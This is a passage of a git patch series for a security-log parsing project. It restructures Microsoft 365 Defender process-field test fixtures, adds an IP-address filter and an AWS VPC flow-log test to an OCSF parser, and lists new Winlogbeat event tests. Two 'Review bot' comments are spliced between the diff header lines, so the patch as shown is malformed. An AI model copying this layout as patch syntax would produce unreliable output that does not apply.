+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
index de75ec66d..0948ffe48 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", 
\"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": 
\"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 6077ecfdc..3e55ad2b0 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json 
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
index f33a1eb87..55684497d 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 3cedbfdb3..5a6e54961 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 3a5d48cd4..9304ca1cb 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,10 +22,14 @@
 "@timestamp": "2024-09-24T14:18:11.864114Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
- "InitiatingProcessFileSize": 11864,
- "InitiatingProcessLogonId": "0",
- "LogonId": "0"
+ "LogonId": "0",
+ "process": {
+ "parent": {
+ "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "FileSize": 11864,
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ProcessCreated"
 },
@@ -55,30 +59,36 @@
 "-F",
 "smtpd_tls_protocols\\commandtest"
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
 "command_line": "grep -F smtpd_tls_protocols\\commandtest",
- "executable": "/usr/test/platform-python3.6",
- "hash": {
- "md5": "eeeee2999444ddaaaaa08598b06eafe7",
- "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
- },
- "name": "platform-python3.6",
+ "name": "grep",
 "parent": {
+ "args": [
+ "--register",
+ "/usr/lib/python3.6/run.py"
+ ],
+ "code_signature": {
+ "status": "Unknown",
+ "subject_name": "Unknown"
+ },
+ "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "executable": "/usr/test/platform-python3.6",
+ "hash": {
+ "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+ "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+ "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
+ },
 "name": "platform-python3.6",
- "pid": 408229,
- "start": "2024-09-24T14:17:34.790000Z"
+ "pid": 408996,
+ "start": "2024-09-24T14:18:11.850000Z",
+ "user": {
+ "domain": "testdomain",
+ "name": "testaccount"
+ },
+ "working_directory": "/usr/test"
 },
 "pid": 408996,
 "start": "2024-09-24T14:18:11.864114Z",
- "user": {
- "domain": "testdomain",
- "name": "testaccount"
- },
- "working_directory": "/usr/test"
+ "working_directory": "/usr/bin"
 },
 "related": {
 "hash": [
From 99b7d065b680791ad270f5eb80aa0b40480c6650 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 14 Nov 2024 09:20:57 +0100
Subject: [PATCH 033/150] fix(OCSF): fix destination.ip
---
 OCSF/ocsf/ingest/parser.yml | 4 +-
 OCSF/ocsf/tests/test_network_activity_7.json | 42 ++++++++++++++++++++
 2 files changed, 45 insertions(+), 1 deletion(-)
 create mode 100644 OCSF/ocsf/tests/test_network_activity_7.json
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 765a6a76d..e43994811 100644
--- a/OCSF/ocsf/ingest/parser.yml
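Review bot: The new expectation sets `process.parent.pid` to `408996`, the same value as `process.pid` three lines further down, where the previous expectation had `408229`; a parent cannot share its child's pid, so unless the fixture input (above this hunk) really carries `408996` in both the initiating-process and process id columns, the parent mapping is now reading the child's pid field and the old value is the correct one. `process.parent.start` moved the same way, from `14:17:34.790000Z` to `14:18:11.850000Z`, fourteen milliseconds before the child's own start, which is consistent with the same source-field swap. The child also loses `executable` and `hash` entirely while keeping `command_line`, so `related.hash` just below the hunk should be checked against the input's hash columns rather than carried over unchanged.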
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -567,9 +567,11 @@ stages:
 destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}"
 filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}"
 - set:
- destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
 destination.mac: "{{ parse_event.message.dst_endpoint.mac }}"
 destination.port: "{{ parse_event.message.dst_endpoint.port }}"
+ - set:
+ destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
+ filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}"
 - set:
 network.application: "{{ parse_event.message.dst_endpoint.svc_name }}"
 filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}"
diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json
new file mode 100644
index 000000000..271c6e7a2
--- /dev/null
+++ b/OCSF/ocsf/tests/test_network_activity_7.json
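Review bot: Only `destination.ip` gets the `is_ipaddress` guard; `destination.mac` and `destination.port` stay in the unconditional `set` just above it, and the fixture added by this commit shows `dst_endpoint` carrying `"-"` for `ip` and `null` for `port`, so if the same placeholder convention reaches `mac` it will be emitted as a literal `-`. The same fixture has `"ip":"-"` in `src_endpoint` too, so the `source.ip` stage (outside this hunk) needs the matching filter unless it already has one. For consistency with the neighbouring filters, which use `.get('hostname')` and `.get('svc_name')`, the new filter would read better as `filter: "{{ parse_event.message.dst_endpoint.get('ip') | is_ipaddress }}"`, which also avoids depending on how `is_ipaddress` treats an undefined value when `ip` is absent. The new test exercises only the placeholder case; a positive `dst_endpoint.ip` case is presumably already covered by the sibling test_network_activity fixtures, but that is worth confirming.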
@@ -0,0 +1,42 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "OCSF [BETA]", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + }, + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "event": { + "action": "unknown", + "category": [ + "network" + ], + "end": "2024-11-13T20:24:18Z", + "kind": "event", + "severity": 1, + "start": "2024-11-13T20:23:47Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-13T20:23:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "availability_zone": "euw3-az1", + "provider": "AWS", + "region": "eu-west-3" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Network Activity", + "class_uid": 4001 + } + } +} \ No 
newline at end of file From b2374d10776dfee644f3660f54064d4ce87002b8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 14 Nov 2024 09:23:57 +0100 Subject: [PATCH 034/150] fix(OCSF): apply linter --- OCSF/ocsf/tests/test_network_activity_7.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json index 271c6e7a2..c6192eda7 100644 --- a/OCSF/ocsf/tests/test_network_activity_7.json +++ b/OCSF/ocsf/tests/test_network_activity_7.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", "sekoiaio": { "intake": { "dialect": "OCSF [BETA]", "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" } - }, - "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + } }, "expected": { "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 14 Nov 2024 11:41:51 +0100 Subject: [PATCH 035/150] Enhancement/Winlogbeat: Addition of new events --- .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++ .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++ .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++ .../winlogbeat/tests/security_event_4672.json | 82 ++++++++ .../winlogbeat/tests/security_event_4689.json | 88 ++++++++ .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++ .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4726.json | 84 ++++++++ .../winlogbeat/tests/security_event_4768.json | 102 +++++++++ .../winlogbeat/tests/security_event_4769.json | 101 +++++++++ .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++ .../winlogbeat/tests/security_event_5140.json | 5 - .../winlogbeat/tests/security_event_5145.json | 7 - 16 files changed, 1587 insertions(+), 12 deletions(-) create mode 100644 Beats/winlogbeat/tests/security_event_4624.json create mode 100644 Beats/winlogbeat/tests/security_event_4625.json create mode 100644 Beats/winlogbeat/tests/security_event_4634.json create mode 100644 Beats/winlogbeat/tests/security_event_4662.json create mode 100644 Beats/winlogbeat/tests/security_event_4672.json create mode 100644 Beats/winlogbeat/tests/security_event_4689.json create mode 100644 Beats/winlogbeat/tests/security_event_4720.json create mode 100644 Beats/winlogbeat/tests/security_event_4722.json create mode 100644 Beats/winlogbeat/tests/security_event_4723.json create mode 100644 Beats/winlogbeat/tests/security_event_4725.json create mode 100644 Beats/winlogbeat/tests/security_event_4726.json create mode 100644 Beats/winlogbeat/tests/security_event_4768.json create mode 100644 
